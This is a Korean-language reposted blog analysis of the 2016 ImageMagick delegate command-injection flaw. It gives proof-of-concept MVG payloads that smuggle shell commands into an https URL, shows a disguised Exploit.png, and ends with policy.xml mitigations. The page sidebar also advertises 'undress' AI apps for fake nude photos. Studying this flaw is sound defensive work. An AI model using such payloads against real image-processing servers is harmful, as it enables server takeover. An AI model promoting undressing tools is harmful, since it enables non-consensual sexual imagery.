백엔드 개발 파이썬 튜토리얼 ImageMagick 명령 실행 취약점에 대한 심층 분석

ImageMagick 명령 실행 취약점에 대한 심층 분석

Dec 05, 2016 pm 01:27 PM
imagemagick 주문하다 허점

00 서문

ImageMagick이란 무엇인가요?

ImageMagick은 널리 사용되는 JPEG, GIF, PNG, PDF 및 PhotoCD 형식을 포함하여 90가지 이상의 이미지 파일을 읽고 쓰고 처리하는 데 사용할 수 있는 강력한 오픈 소스 그래픽 처리 소프트웨어입니다. 자르기, 회전, 결합 등 다양한 특수효과로 사진을 가공할 때 사용합니다.

강력한 기능과 우수한 성능, 다양한 언어에 대한 확장된 지원으로 인해 프로그램 개발에 널리 사용됩니다. 많은 웹사이트 개발자는 ImageMagick 확장 프로그램을 사용하여 사용자 아바타 생성, 이미지 편집 등과 같은 웹에서 이미지 처리 작업을 수행하는 것을 좋아합니다.

01 취약점 설명

ImageMagick은 PHP, Ruby, NodeJS, Python 등 다국어를 지원하며 널리 사용되는 오픈소스 이미지 처리 라이브러리입니다. PHP imagick, Ruby rmagick 및 paperclip, NodeJS imagemagick을 포함한 많은 이미지 처리 플러그인은 모두 이를 사용하여 실행됩니다. 공격자가 악성 코드가 포함된 이미지를 구성하면 ImageMagick 라이브러리가 HTTPPS 파일을 부적절하게 처리하고 어떠한 필터링도 수행하지 않으며 원격으로 명령을 실행하고 서버를 제어할 수도 있습니다.

02 영향도

공격 비용: 낮음

위험도: 높음

영향을 받는 범위: ImageMagick 6.9.3-9 이전의 모든 버전

03 취약점 분석

ImageMagick이 https 파일을 처리하는 과정에서 명령어 실행 취약점이 발생합니다.

ImageMagick이 이렇게 많은 파일 형식을 지원하는 이유는 이미지 처리 라이브러리가 많이 내장되어 있기 때문입니다. 이러한 이미지 처리 라이브러리의 경우 ImageMagick에서 이름을 "Delegate"(대리인)로 지정하고 각 Delegate는 의 A 파일에 해당합니다. 형식을 지정한 다음 시스템의 system() 명령을 통해 처리하기 위해 외부 lib를 호출합니다. 외부 lib를 호출하는 프로세스는 시스템의 시스템 명령을 사용하여 실행되고, 그 결과 코드가 명령을 실행하게 됩니다.

ImageMagick 대리인의 기본 구성 파일: /etc/ImageMagick/delegates.xml

구체적인 코드는 Github-ImageMagick을 참조하세요

https 위임 라인을 찾습니다:

" <delegate decode=\"https\" command=\""wget" -q -O "%o" "https:%M"\"/>"
로그인 후 복사

보시다시피 command는 https 파일을 처리할 때 system() 함수에 가져오는 명령을 정의합니다: "wget" -q -O "%o" "https:%M".

wget은 네트워크에서 파일을 다운로드하는 명령입니다. %M은 다음과 같이 구성 파일에 구체적으로 정의되어야 합니다.

%i input image filename
%o output image filename
%u unique temporary filename
%Z unique temporary filename
%# input image signature
%b image file size
%c input image comment
%g image geometry
%h image rows (height)
%k input image number colors
%l image label
%m input image format
%p page number
%q input image depth
%s scene number
%w image columns (width)
%x input image x resolution
%y input image y resolution
로그인 후 복사

우리가 입력한 URL 주소인 입력 이미지 형식으로 %m이 정의되어 있는 것을 볼 수 있습니다. 하지만 필터링 없이 단순 문자열 이어붙이기만 하고 명령어 명령어에 직접 이어붙였기 때문에 "|", "`", "&" 등을 통해 따옴표를 닫고 다른 명령어로 불러올 수 있습니다. 즉, Command 주입이 형성됩니다.

예를 들어 다음 코드를 전달합니다.

https://test.com"|ls “-al
로그인 후 복사

시스템 기능에 의해 실행되는 실제 명령은 다음과 같습니다.

“wget” -q -O “%o” “ https://test.com"|ls “-al”
로그인 후 복사

이렇게 하면 ls -al 명령이 성공적으로 실행됩니다.

04 취약점 악용

이 취약점에 대한 POC는 다음과 같이 외국인에 의해 제공되었습니다.

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|id; ")'
pop graphic-context
로그인 후 복사

푸시 및 팝은 스택 작업에 ​​사용되며, 하나는 스택에 푸시되고 다른 하나는 스택에서 팝됩니다.

Viewbox는 SVG의 가시 영역의 크기를 나타내며, 스테이지 크기나 캔버스 크기로 상상해도 됩니다. 간단한 이해는 다음 매개변수를 기반으로 화면의 일부를 선택하는 것입니다.

fill url()은 이미지를 현재 요소에 채웁니다.

여기서 fill url()을 사용하여 취약한 https 대리자를 호출합니다. ImageMagick이 이 파일을 처리하면 취약점이 트리거됩니다.

첨부 파일: ImageMagick은 기본적으로 mvg라는 이미지 형식을 지원하며 mvg는 svg 형식과 유사합니다. 이 형식에서는 벡터 이미지의 내용이 텍스트 형식으로 작성되어 ImageMagick의 다른 대리자를 로드할 수 있습니다(예: 취약한 https 위임). 그리고 그래픽 처리 과정에서 ImageMagick은 콘텐츠에 따라 자동으로 처리합니다. 즉, 파일을 웹 사이트 업로드에 허용되는 png, jpg 및 기타 형식으로 임의로 정의할 수 있으며, 이는 취약점의 악용 가능한 시나리오를 크게 증가시킵니다.

사용 과정:

다음 내용으로 Exploit.png 파일을 만듭니다.

push graphic-context
viewbox 0 0 640 480
fill 'url(https://test.com/image.jpg"|ls "-al)'
pop graphic-context
로그인 후 복사

실행 명령: Convert explore.png 1.png (다음은 변환 매개변수입니다)

05개 버그 수정

최신 버전으로 업그레이드

/etc/ImageMagick/policy.xml을 구성하여 https 및 mvg 대리인을 비활성화하거나 해당 대리인을 구성 파일에서 직접 삭제하세요

<policymap>
<policy domain="coder" rights="none" pattern="EPHEMERAL" />
<policy domain="coder" rights="none" pattern="URL" />
<policy domain="coder" rights="none" pattern="HTTPS" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="MSL" />
</policymap>
로그인 후 복사
이상은 편집자가 소개한 ImageMagick 명령 실행 취약점에 대한 지식입니다. 궁금한 사항이 있는 경우 메시지를 남겨주시면 편집자가 시간에 맞춰 답변해 드리겠습니다. 또한 Script House 웹사이트를 지원해 주시는 모든 분들께 감사의 말씀을 전하고 싶습니다!

본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

AI Hentai Generator

AI Hentai Generator

AI Hentai를 무료로 생성하십시오.

뜨거운 도구

메모장++7.3.1

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

드림위버 CS6

드림위버 CS6

시각적 웹 개발 도구

SublimeText3 Mac 버전

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

Windows 11/10에서 SUDO 명령을 실행하는 방법 Windows 11/10에서 SUDO 명령을 실행하는 방법 Mar 09, 2024 am 09:50 AM

sudo 명령을 사용하면 사용자는 수퍼유저 모드로 전환하지 않고도 상승된 권한 모드에서 명령을 실행할 수 있습니다. 이 기사에서는 Windows 시스템에서 sudo 명령과 유사한 기능을 시뮬레이션하는 방법을 소개합니다. 슈도사령부란 무엇인가? Sudo("superuser do"의 약어)는 Linux 및 MacOS와 같은 Unix 기반 운영 체제 사용자가 일반적으로 관리자가 보유하는 높은 권한으로 명령을 실행할 수 있도록 하는 명령줄 도구입니다. Windows 11/10에서 SUDO 명령 실행 그러나 최신 Windows 11 Insider 미리 보기 버전이 출시되면서 Windows 사용자는 이제 이 기능을 경험할 수 있습니다. 이 새로운 기능을 통해 사용자는 다음을 수행할 수 있습니다.

Win11에서 네트워크 카드의 MAC 주소를 확인하는 방법 Win11에서 네트워크 카드의 MAC 주소를 얻는 명령을 사용하는 방법은 무엇입니까? Win11에서 네트워크 카드의 MAC 주소를 확인하는 방법 Win11에서 네트워크 카드의 MAC 주소를 얻는 명령을 사용하는 방법은 무엇입니까? Feb 29, 2024 pm 04:34 PM

이 문서에서는 명령 프롬프트(CommandPrompt)를 사용하여 Win11 시스템에서 네트워크 어댑터의 물리적 주소(MAC 주소)를 찾는 방법을 독자에게 소개합니다. MAC 주소는 네트워크 통신에서 중요한 역할을 하는 네트워크 인터페이스 카드(NIC)의 고유 식별자입니다. 명령 프롬프트를 통해 사용자는 현재 컴퓨터에 있는 모든 네트워크 어댑터의 MAC 주소 정보를 쉽게 얻을 수 있으며 이는 네트워크 문제 해결, 네트워크 설정 구성 및 기타 작업에 매우 유용합니다. 방법 1: "명령 프롬프트" 사용 1. [Win+X] 키 조합을 누르거나 [마우스 오른쪽 버튼 클릭] 작업 표시줄의 [Windows 로고]를 클릭하고 메뉴 항목이 열리면 [실행]을 선택합니다. .창을 실행하고 [cmd] 명령어를 입력한 후

Hyperv 고급 세션 모드는 어디에 있습니까? Win11에서 명령을 사용하여 Hyper-V 고급 세션 모드를 활성화 또는 비활성화하는 팁 Hyperv 고급 세션 모드는 어디에 있습니까? Win11에서 명령을 사용하여 Hyper-V 고급 세션 모드를 활성화 또는 비활성화하는 팁 Feb 29, 2024 pm 05:52 PM

Win11 시스템에서는 명령을 통해 Hyper-V 고급 세션 모드를 활성화하거나 비활성화할 수 있습니다. 이 문서에서는 명령을 사용하여 사용자가 시스템에서 Hyper-V 기능을 더 잘 관리하고 제어할 수 있도록 돕는 방법을 소개합니다. Hyper-V는 Microsoft에서 제공하는 가상화 기술로 Windows Server와 Windows 10 및 11(Home Edition 제외)에 내장되어 있어 사용자가 Windows 시스템에서 가상 운영 체제를 실행할 수 있습니다. 가상 머신은 호스트 운영 체제에서 격리되어 있지만 설정을 통해 사운드 카드, 저장 장치 등 호스트 리소스를 계속 사용할 수 있습니다. 주요 설정 중 하나는 고급 세션 모드를 활성화하는 것입니다. 고급 세션 모드는 Hyper입니다.

매우 실용적입니다! 당신을 리눅스 마스터로 만들어주는 Sar 명령 매우 실용적입니다! 당신을 리눅스 마스터로 만들어주는 Sar 명령 Mar 01, 2024 am 08:01 AM

1. 개요 sar 명령은 시스템 활동에서 수집된 데이터를 통해 시스템 사용 보고서를 표시합니다. 이러한 보고서는 다양한 섹션으로 구성되어 있으며 각 섹션에는 데이터 유형과 데이터 수집 시기가 포함되어 있습니다. sar 명령의 기본 모드는 CPU에 액세스하는 다양한 리소스(예: 사용자, 시스템, I/O 스케줄러 등)에 대해 다양한 시간 증분으로 CPU 사용량을 표시합니다. 또한 특정 기간 동안 유휴 CPU의 비율을 표시합니다. 각 데이터 포인트의 평균값은 보고서 하단에 나열됩니다. sar 보고서는 기본적으로 10분마다 데이터를 수집하지만 다양한 옵션을 사용하여 이러한 보고서를 필터링하고 조정할 수 있습니다. uptime 명령과 마찬가지로 sar 명령도 CPU 로드를 모니터링하는 데 도움이 될 수 있습니다. sar를 통해 과도한 부하 발생을 이해할 수 있다.

Linux의 아티팩트: eventfd의 원리 및 응용 Linux의 아티팩트: eventfd의 원리 및 응용 Feb 13, 2024 pm 08:30 PM

Linux는 파이프, 신호, 메시지 큐, 공유 메모리 등과 같은 효율적인 프로세스 간 통신 메커니즘을 제공하는 강력한 운영 체제입니다. 하지만 더 간단하고 유연하며 효율적인 의사소통 방법이 있을까요? 대답은 '예'입니다. 그게 eventfd입니다. eventfd는 Linux 버전 2.6에 도입된 시스템 호출로, 이벤트 알림을 구현하는 데, 즉 파일 설명자를 통해 이벤트를 전달하는 데 사용할 수 있습니다. eventfd에는 커널이 유지 관리하는 64비트 부호 없는 정수 카운터가 포함되어 있습니다. 프로세스는 프로세스 간 통신을 달성하기 위해 이 파일 설명자를 읽고 쓰면서 카운터 값을 읽고 변경할 수 있습니다. eventfd의 장점은 무엇입니까? 그것은 다음과 같은 기능을 가지고 있습니다

Linux에서 서비스를 다시 시작하는 올바른 방법은 무엇입니까? Linux에서 서비스를 다시 시작하는 올바른 방법은 무엇입니까? Mar 15, 2024 am 09:09 AM

Linux에서 서비스를 다시 시작하는 올바른 방법은 무엇입니까? Linux 시스템을 사용하다 보면 서비스를 다시 시작해야 하는 상황이 자주 발생하지만, 서비스를 다시 시작할 때 서비스가 실제로 중지되지 않거나 시작되지 않는 등의 문제가 발생할 수도 있습니다. 따라서 서비스를 다시 시작하는 올바른 방법을 익히는 것이 매우 중요합니다. Linux에서는 일반적으로 systemctl 명령을 사용하여 시스템 서비스를 관리할 수 있습니다. systemctl 명령은 systemd 시스템 관리자의 일부입니다.

win11 위젯을 삭제하는 방법 Windows 11 위젯 기능 팁을 제거하는 명령 win11 위젯을 삭제하는 방법 Windows 11 위젯 기능 팁을 제거하는 명령 Apr 11, 2024 pm 05:19 PM

위젯은 Win11 시스템의 새로운 기능입니다. 그러나 일부 사용자가 위젯을 많이 사용하지 않고 공간을 차지하기 때문에 비활성화하려는 경우가 있습니다. 아래 편집기에서 작동 방법을 가르쳐 드리며 직접 사용해 보실 수 있습니다. 위젯이란 무엇입니까? 위젯은 Windows 바탕 화면에서 즐겨 사용하는 앱과 서비스의 동적 콘텐츠를 표시하는 작은 카드입니다. 이러한 위젯은 위젯 보드에 나타나며, 여기에서 귀하의 관심사를 반영하여 위젯을 검색하고, 고정하고, 고정 해제하고, 정렬하고, 크기를 조정하고, 사용자 정의할 수 있습니다. 위젯보드는 사용량에 따른 관련 위젯과 개인화된 콘텐츠를 표시하도록 최적화되어 있습니다. 실시간 날씨를 볼 수 있는 작업 표시줄 왼쪽 모서리에 있는 위젯 팔레트를 엽니다.

LSOF를 사용하여 실시간으로 포트를 모니터링하는 방법 LSOF를 사용하여 실시간으로 포트를 모니터링하는 방법 Mar 20, 2024 pm 02:07 PM

LSOF(ListOpenFiles)는 Linux/Unix 운영 체제와 유사한 시스템 리소스를 모니터링하는 데 주로 사용되는 명령줄 도구입니다. LSOF 명령을 통해 사용자는 시스템의 활성 파일과 이러한 파일에 액세스하는 프로세스에 대한 자세한 정보를 얻을 수 있습니다. LSOF는 사용자가 현재 파일 리소스를 점유하고 있는 프로세스를 식별하는 데 도움이 되므로 시스템 리소스를 더 잘 관리하고 가능한 문제를 해결할 수 있습니다. LSOF는 강력하고 유연하며 시스템 관리자가 파일 누출, 닫히지 않은 파일 설명자 등과 같은 파일 관련 문제를 신속하게 찾는 데 도움이 될 수 있습니다. LSOF 명령을 통해 LSOF 명령줄 도구를 사용하면 시스템 관리자와 개발자는 다음을 수행할 수 있습니다. 포트 충돌이 발생할 경우 현재 특정 파일이나 포트를 사용하고 있는 프로세스를 확인합니다.

See all articles